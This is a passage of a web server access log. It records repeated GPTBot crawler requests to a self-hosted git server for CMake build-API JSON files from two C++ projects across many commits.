192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:36:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35731] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:36:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35705] [Gzip 10.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:36:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 42765] [Gzip 21.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:18:36:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 9992] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:18:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 42767] [Gzip 21.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:18:36:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 13145] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:36:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 13143] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:36:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46762] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:36:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:36:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46761] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:36:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 12998] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:18:36:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46755] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:36:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46733] [Gzip 22.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:36:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9982] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:36:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9962] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:36:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:36:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 12998] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:18:36:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:18:36:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 9995] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:18:36:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 12996] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:18:36:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 9995] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:18:36:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 1254] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:18:36:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:36:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:36:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 15189] [Gzip 10.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:18:36:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 15216] [Gzip 10.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:18:36:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35737] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:36:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35734] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:36:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35738] [Gzip 10.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:36:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:36:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 1254] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:18:36:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 42761] [Gzip 21.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:18:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 13117] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:36:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 9993] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:18:36:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 13143] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:36:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 15214] [Gzip 10.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:18:36:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 1254] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:18:36:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46758] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:36:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46756] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:36:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 46758] [Gzip 22.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:36:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9983] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:18:36:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 